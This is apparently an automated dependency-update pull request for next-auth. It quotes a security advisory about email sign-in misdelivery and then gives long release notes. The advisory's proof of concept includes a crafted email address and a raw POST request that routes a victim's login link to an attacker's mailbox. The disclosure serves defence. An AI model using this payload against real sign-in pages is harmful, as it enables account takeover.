chore(deps): update dependency next-auth to v5.0.0-beta.30 [security]

[renovate]

This PR contains the following updates:

Package	Change	Age	Confidence
next-auth (source)	5.0.0-beta.25 → 5.0.0-beta.30

---

NextAuthjs Email misdelivery Vulnerability

GHSA-5jpx-9hw9-2fx4

More information

Details

Summary

NextAuth.js's email sign-in can be forced to deliver authentication emails to an attacker-controlled mailbox due to a bug in nodemailer's address parser used by the project (fixed in nodemailer v7.0.7). A crafted input such as:

"e@attacker.com"@​victim.com

is parsed incorrectly and results in the message being delivered to e@attacker.com (attacker) instead of "<e@attacker.com>@&#8203;victim.com" (the intended recipient at victim.com) in violation of RFC 5321/5322 semantics. This allows an attacker to receive login/verification links or other sensitive emails intended for the victim.

Affected NextAuthjs Version

≤ Version	Afftected
4.24.11	Yes
5.0.0-beta.29	Yes

POC

Example Setup showing misdelivery of email

import NextAuth from "next-auth"
import Nodemailer from "next-auth/providers/nodemailer"
import { PrismaAdapter } from "@​auth/prisma-adapter"
import { prisma } from "@​/lib/prisma"

export const { handlers, auth, signIn, signOut } = NextAuth({
  adapter: PrismaAdapter(prisma),
  providers: [
    Nodemailer({
      server: {
        host: "127.0.0.1",
        port: 1025,
        ...
      },
      from: "noreply@authjs.dev",
    }),
  ],
  pages: {
    signIn: '/auth/signin',
    verifyRequest: '/auth/verify-request',
  },
})

POST /api/auth/signin/nodemailer HTTP/1.1
Accept-Encoding: gzip, deflate, br, zstd
Cache-Control: no-cache
Connection: keep-alive
Content-Length: 176
DNT: 1
Host: localhost:3000
Origin: http://localhost:3000
Pragma: no-cache
Referer: http://localhost:3000/auth/signin
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.0.0 Safari/537.36
accept: */*
accept-language: en-US,en;q=0.9,ta;q=0.8
content-type: application/x-www-form-urlencoded
sec-ch-ua: "Google Chrome";v="141", "Not?A_Brand";v="8", "Chromium";v="141"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Linux"
x-auth-return-redirect: 1

email=%22e%40attacker.coccm%22%40victim.com&csrfToken=90f5e6f48ab577ab011f212011862dcfe546459c23764cf891aab2d176f8d77a&callbackUrl=http%3A%2F%2Flocalhost%3A3000%2Fauth%2Fsignin

Mitigation

Update to nodemailer 7.0.7

Credits

https://zeropath.com/ Helped identify this security issue

Severity

• CVSS Score: 6.9 / 10 (Medium)
• Vector String: CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:H/VI:L/VA:N/SC:N/SI:N/SA:N/E:P

References

• https://github.com/nextauthjs/next-auth/security/advisories/GHSA-5jpx-9hw9-2fx4
• https://github.com/nextauthjs/next-auth/commit/82efcf81f218aae43683f8dd2f7c260ef69b3ece
• https://github.com/nextauthjs/next-auth/commit/8f3b2c7af0fe08973a12f616517c3ec85a5cd172
• https://github.com/advisories/GHSA-5jpx-9hw9-2fx4

This data is provided by the GitHub Advisory Database (CC-BY 4.0).

---

Release Notes

nextauthjs/next-auth (next-auth)

v5.0.0-beta.30

Compare Source

v5.0.0-beta.29

Compare Source

What's Changed

• fix: always check typeof BroadcastChannel by @​maiconcarraro in #​12937
• fix(providers): enable OIDC capabilities for Keycloak by @​jvllmr in #​12964
• Fix typo: succesful -> successful by @​changeworld in #​12973
• Fix undefined providerId by @​Regloom in #​12947
• docs: fix typo profie -> profile by @​changeworld in #​12987
• docs: Fix typo initalization -> initialization by @​changeworld in #​12989
• docs: Fix typo depencies -> dependencies by @​changeworld in #​12983
• docs: add missing "key" prop for form element in providerMap iterator by @​frshaad in #​13023
• chore(docs): fix typo Minmum -> Minimum by @​changeworld in #​13007
• chore(docs): fix typo Avaliable Scopes -> Available Scopes by @​changeworld in #​13009
• fix(adapter): transistion to surrealdb@^1.0.0 by @​dvanmali in #​11911
• Fix(provider): Mailgun region selection by @​benhovinga in #​13027
• fix(next-auth): add missing middleware wrapper type to auth function by @​k-taro56 in #​13026
• Update extending-the-session.mdx by @​adriancuadrado in #​13064
• fix(adapters): handle P2025 errors without importing Prisma namespace by @​karl-barbour in #​13061
• chore(docs): Fix syntax error in RBAC guide by @​benhovinga in #​12733
• fix(provider): Microsoft Entra ID by @​benhovinga in #​12616
• Update index.ts by @​adriancuadrado in #​13066

New Contributors

• @​maiconcarraro made their first contribution in #​12937
• @​jvllmr made their first contribution in #​12964
• @​Regloom made their first contribution in #​12947
• @​frshaad made their first contribution in #​13023
• @​dvanmali made their first contribution in #​11911
• @​adriancuadrado made their first contribution in #​13064
• @​karl-barbour made their first contribution in #​13061

Full Changelog: https://github.com/nextauthjs/next-auth/compare/next-auth@5.0.0-beta.28...next-auth@5.0.0-beta.29

v5.0.0-beta.28

Compare Source

What's Changed

• chore(docs): improve documentation in Credentials provider by @​halvaradop in #​12873
• fix(prisma): import PrismaClientKnownRequestError for edge runtime compatibility by @​twinh in #​12755
• docs: fix typo in Asgardeo provider by @​brionmario in #​12943
• fix(core): AuthError.type should not be internal by @​ThangHuuVu in #​12946
• fix(qwik): don't build server deps on client by @​wmertens in #​12723
• fix: correct typo in signin.mdx by @​nougat-sw in #​12939
• Fix file in Google example by @​AlexWendland in #​12938

New Contributors

• @​twinh made their first contribution in #​12755
• @​brionmario made their first contribution in #​12943
• @​wmertens made their first contribution in #​12723
• @​nougat-sw made their first contribution in #​12939
• @​AlexWendland made their first contribution in #​12938

Full Changelog: https://github.com/nextauthjs/next-auth/compare/next-auth@5.0.0-beta.27...next-auth@5.0.0-beta.28

v5.0.0-beta.27

Compare Source

What's Changed

• fix(next-auth): AppRouteHandlerFnContext type by @​ThangHuuVu in #​12901

Full Changelog: https://github.com/nextauthjs/next-auth/compare/next-auth@5.0.0-beta.26...next-auth@5.0.0-beta.27

v5.0.0-beta.26

What's Changed

• chore(docs): Qwik code example was using sveltekit code, corrected by @​rpdave in #​12078
• Docs: Provide Explicit Instructions Within "Securing a preview deployment" Section by @​Zac-Zajdel in #​12081
• upgrade nextra by @​falcowinkler in #​12088
• docs: replace tenantId with issuer for Entra ID documentation by @​rfverbruggen in #​12103
• chore: update database.mdx by @​ParthModi9494 in #​12131
• chore(docs): update refresh-token-rotation.mdx by @​riuandg5 in #​12135
• chore(docs): update asgardeo.mdx by @​ggomarighetti in #​12070
• chore(docs): enhance api reference with styles for providers by @​halvaradop in #​11961
• fix: JSON.stringify session by @​r3m00n in #​12162
• fix(nextjs): Update params type with Promise as expected in Next.js 15 by @​ggallon in #​12114
• fix(providers): dropbox authorization params should contain token_access_type by @​omotenko in #​12161
• Correct the type signature of account in callbacks. by @​w9 in #​12017
• chore(sponsors): add sent.dm by @​ndom91 in #​12171
• fix(core): use correct import for the cookie package by @​balazsorban44 in #​12177
• fix(providers): Ease authorization and scope override for Discord provider by @​viAtom in #​12173
• refactor(tiktok): Update TikTok provider configuration with custom Fetch by @​DewinU in #​12168
• fix(core): carry-over request params for custom verifyRequest page by @​larryonward in #​12166
• chore(deps): bump cookie from 0.6.0 to 1.0.1 by @​dependabot in #​12178
• fix(core): vendor cookie until it has an ESM build by @​balazsorban44 in #​12248
• fix: improve client-side submodules by @​balazsorban44 in #​12249
• deps: automate jose and oauth4webapi updates by @​panva in #​12256
• chore(deps): bump oauth4webapi from 3.1.1 to 3.1.3 by @​dependabot in #​12261
• fix(docs): OAuth instructions layout by @​0ubbe in #​12277
• fix: add a missed instance of allowInsecureRequests by @​panva in #​12276
• docs: update drizzle commands due to deprecation by @​Pyr33x in #​12268
• chore(ci): skip e2e tests if unnecessary by @​ThangHuuVu in #​12282
• Added documentation for Vipps MobilePay by @​Fredneyy in #​12289
• chore(docs): add missing bracket and run format by @​halvaradop in #​12302
• Update prisma.mdx by @​dugajean in #​12286
• feat(providers): Add Loops Email Provider and Documentation by @​Whats-A-MattR in #​11197
• chore(docs): fix clickup id by @​vytenisstaugaitis in #​12320
• fix(prisma): add support for prisma v6 by @​WikiRik in #​12319
• chore(docs): update index.mdx typo by @​wmbond in #​12323
• chore: improve code related to OAuth section by @​halvaradop in #​11954
• chore(deps): bump oauth4webapi from 3.1.3 to 3.1.4 by @​dependabot in #​12359
• chore(deps-dev): bump @​sveltejs/kit from 2.5.7 to 2.8.3 in /apps/examples/sveltekit by @​dependabot in #​12324
• chore(examples): remove unnecessary 'as any' on route return by @​FinnWard in #​12399
• docs(getting-started/database): fix link to VerificationToken by @​Juneezee in #​12377
• chore(docs): update refresh-token-rotation.mdx by @​Sparticuz in #​12396
• fix(sveltekit): adds the missing input field for redirectTo by @​NazgoooAtanasov in #​12315
• chore(adapter-kysely): update kysely to v0.27.5 by @​rickythefox in #​12386
• chore(docs): fixes appearance for some logos in dark mode by @​sormiston in #​12379
• chore(drizzle): fix typo verfication to verification by @​nrjdalal in #​12376
• feat(provider): add Frontegg provider by @​vladFrontegg in #​11342
• docs: add HTML sign-in form example for Express - credentials.mdx by @​manjeetshinde in #​12316
• chore(ci): add express label for pr-labeler GHA by @​bjohansebas in #​12343
• chore: update pnpm-lock, prettier, prisma types by @​ndom91 in #​12414
• docs: more explicit about redirect proxy setup in stable environment by @​16patsle in #​12312
• docs: ✏️ fix parts of svelte documentation by @​odulcy in #​12251
• Update Redirect Proxy related documentation to clarify support for form_post providers. by @​garshythoel in #​12309
• remove console.log in wechat auth provider by @​arvinxx in #​12431
• fix(prisma): replace select with include for user relation query by @​mcorbelli in #​12434
• chore(docs): update drizzle postgres schema example by @​jcqvisser in #​12448
• chore(docs): add Express sign-in and sign-out route examples to session management by @​kingdavidHub in #​12450
• chore(docs): fix kysely docs URL by @​kchung in #​12468
• feat: introduce @​auth/neon-adapter by @​rishi-raj-jain in #​12295
• chore(deps): bump next from 14.2.15 to 14.2.21 in /docs by @​dependabot in #​12466
• fix(ts): make User interface overridable using module augmentation by @​comxd in #​12472
• chore(docs): Update Express sign-in and sign-out examples with TypeScript by @​kingdavidHub in #​12467
• Add default export to adapter-mikro-orm by @​xN4P4LM in #​12445
• test(express): added await to some tests. by @​KostyaTretyak in #​12439
• chore(dev): added no-floating-promises rule and projectService: true to eslint config by @​KostyaTretyak in #​12440
• feat: support express v5 by @​bjohansebas in #​12342
• Fix eve online setup guide by @​Nfinished in #​12418
• Update _meta.js by @​rishi-raj-jain in #​12477
• fix(core): handle an error inside parseProviders() when providerId not found in config by @​KostyaTretyak in #​12438
• feat: add slugify to select tab framework by @​halvaradop in #​11951
• chore(docs): update email.mdx typo by @​Ersch in #​12483
• Update login.mdx by @​giedrius-jankauskas in #​12482
• feat(provider): add Bitbucket provider by @​halvaradop in #​12198
• docs: use DocSearch instead of own component by @​ThangHuuVu in #​12553
• feat(provider): add Logto provider by @​wangsijie in #​12534
• feat(provider): add Figma provider by @​halvaradop in #​12529
• docs: dark mode for DocSearch by @​ThangHuuVu in #​12564
• Fix incorrect URL in error page documentation comment by @​maurobrandoni in #​12502
• chore(docs): add opencollective recommended refund disclaimer to /sponsors by @​ndom91 in #​12575
• chore: stale bot issues only by @​ndom91 in #​12593
• fix: update twitter icon by @​sarthak-kumar-shailendra in #​12091
• fix(pages): recouple button theme to colorScheme and fix appearance for some logos in dark mode by @​EdmundDong in #​12537
• docs(express): add TypeScript guide for custom session properties by @​Exe16Kishan in #​12590
• Added import "Link" to Qwik Sign-In Docs by @​aliyss in #​12592
• rename adapter.ts -> adapters.ts in @auth/sveltekit by @​emme1444 in #​12503
• fix: More descriptive error in case that discovery endpoint returns an invalid issuer by @​falcowinkler in #​12611
• chore(docs): update microsoft-entra-id.mdx .env.local description by @​rogeriocassares in #​12612
• docs: Rename clickup.svg to click-up.svg by @​odeta939 in #​12619
• chore(deps-dev): bump vite from 3.2.10 to 4.5.6 in /apps/examples/solid-start by @​dependabot in #​12556
• missing comma on dynamodb adapter by @​dkeithdj in #​12599
• Downgrade requested OAuth scope of TikTok provider by @​and-oli in #​12608
• chore(deps-dev): bump vite from 5.3.4 to 5.4.12 in /apps/examples/qwik by @​dependabot in #​12620
• Export NextAuthRequest type from next-auth root by @​mahady-manana in #​12207
• docs: exclude inherits by @​ThangHuuVu in #​12628
• chore(docs) Remove spaces from imported identifier by @​benhovinga in #​12644
• Revert "docs: exclude inherits, update deps (#​12628)" by @​ThangHuuVu in #​12645
• fix(docs): broken link for Postmark API key by @​ajey35 in #​12651
• feat(core): add default cache control headers for GET endpoints by @​ThangHuuVu in #​11667
• fix: Correct name of Adapter by @​agilxpgeoffrey in #​12648
• chore(deps): bump jose from 5.9.6 to 6.0.6 by @​dependabot in #​12699
• chore(deps): bump oauth4webapi from 3.1.4 to 3.3.0 by @​dependabot in #​12698
• fix: "state is not specified" error when using LINE provider by @​weeix in #​12703
• fix: fix GitHub and TypeScript typo by @​changeworld in #​12678
• docs: Reapply "docs: exclude inherits, update deps (#​12628)" (#​12645) by @​ThangHuuVu in #​12690
• chore(docs): Update dark theme SVG inverter by @​benhovinga in #​12730
• fix(docs): code tabs behavior by @​diedu89 in #​12652
• docs: add export to provider example in microsoft-entra-id.mdx by @​TyTheTechie in #​12790
• docs: rm unused import statement from refresh token rotation page example code by @​karthikappiah in #​12804
• docs: fix accidentally duplicated line by @​jonathanagustin in #​12811
• docs: update corporate-proxy.mdx with https-proxy-agent example by @​serolfy in #​12817
• fix(docs): add missing constant in code example by @​PieterDePauw in #​12870
• Improve error validation for Microsoft EntraID provider errors before decoding token by @​kwilcz in #​12876
• providers: Add huggingface by @​coyotte508 in #​12884

New Contributors

• @​rpdave made their first contribution in #​12078
• @​Zac-Zajdel made their first contribution in #​12081
• @​rfverbruggen made their first contribution in #​12103
• @​ParthModi9494 made their first contribution in #​12131
• @​riuandg5 made their first contribution in #​12135
• @​ggomarighetti made their first contribution in #​12070
• @​r3m00n made their first contribution in #​12162
• @​omotenko made their first contribution in #​12161
• @​w9 made their first contribution in #​12017
• @​viAtom made their first contribution in #​12173
• @​larryonward made their first contribution in #​12166
• @​Pyr33x made their first contribution in #​12268
• @​Fredneyy made their first contribution in #​12289
• @​dugajean made their first contribution in #​12286
• @​Whats-A-MattR made their first contribution in #​11197
• @​vytenisstaugaitis made their first contribution in #​12320
• @​WikiRik made their first contribution in #​12319
• @​wmbond made their first contribution in #​12323
• @​FinnWard made their first contribution in #​12399
• @​Sparticuz made their first contribution in #​12396
• @​NazgoooAtanasov made their first contribution in #​12315
• @​rickythefox made their first contribution in #​12386
• @​sormiston made their first contribution in #​12379
• @​vladFrontegg made their first contribution in #​11342
• @​manjeetshinde made their first contribution in #​12316
• @​bjohansebas made their first contribution in #​12343
• @​16patsle made their first contribution in #​12312
• @​odulcy made their first contribution in #​12251
• @​garshythoel made their first contribution in #​12309
• @​arvinxx made their first contribution in #​12431
• @​mcorbelli made their first contribution in #​12434
• @​jcqvisser made their first contribution in #​12448
• @​kingdavidHub made their first contribution in #​12450
• @​kchung made their first contribution in #​12468
• @​rishi-raj-jain made their first contribution in #​12295
• @​comxd made their first contribution in #​12472
• @​xN4P4LM made their first contribution in #​12445
• @​KostyaTretyak made their first contribution in #​12439
• @​Nfinished made their first contribution in #​12418
• @​Ersch made their first contribution in #​12483
• @​giedrius-jankauskas made their first contribution in #​12482
• @​wangsijie made their first contribution in #​12534
• @​maurobrandoni made their first contribution in #​12502
• @​sarthak-kumar-shailendra made their first contribution in #​12091
• @​EdmundDong made their first contribution in #​12537
• @​Exe16Kishan made their first contribution in #​12590
• @​aliyss made their first contribution in #​12592
• @​emme1444 made their first contribution in #​12503
• @​rogeriocassares made their first contribution in #​12612
• @​odeta939 made their first contribution in #​12619
• @​dkeithdj made their first contribution in #​12599
• @​and-oli made their first contribution in #​12608
• @​mahady-manana made their first contribution in #​12207
• @​benhovinga made their first contribution in #​12644
• @​ajey35 made their first contribution in #​12651
• @​agilxpgeoffrey made their first contribution in #​12648
• @​weeix made their first contribution in #​12703
• @​diedu89 made their first contribution in #​12652
• @​TyTheTechie made their first contribution in #​12790
• @​karthikappiah made their first contribution in #​12804
• @​jonathanagustin made their first contribution in #​12811
• @​serolfy made their first contribution in #​12817
• @​PieterDePauw made their first contribution in #​12870
• @​kwilcz made their first contribution in #​12876
• @​coyotte508 made their first contribution in #​12884

Full Changelog: https://github.com/nextauthjs/next-auth/compare/next-auth@5.0.0-beta.24...next-auth@5.0.0-beta.26

---

Configuration

📅 Schedule: (UTC)

• Branch creation
  • ""
• Automerge
  • At any time (no schedule defined)

🚦 Automerge: Enabled.

♻ Rebasing: Whenever PR is behind base branch, or you tick the rebase/retry checkbox.

🔕 Ignore: Close this PR and you won't be reminded about this update again.

---

• If you want to rebase/retry this PR, check this box

---

This PR was generated by Mend Renovate. View the repository job log.

[vercel]

The latest updates on your projects. Learn more about Vercel for GitHub.

Project	Deployment	Actions	Updated (UTC)
lipi	Error		Apr 27, 2026 11:12pm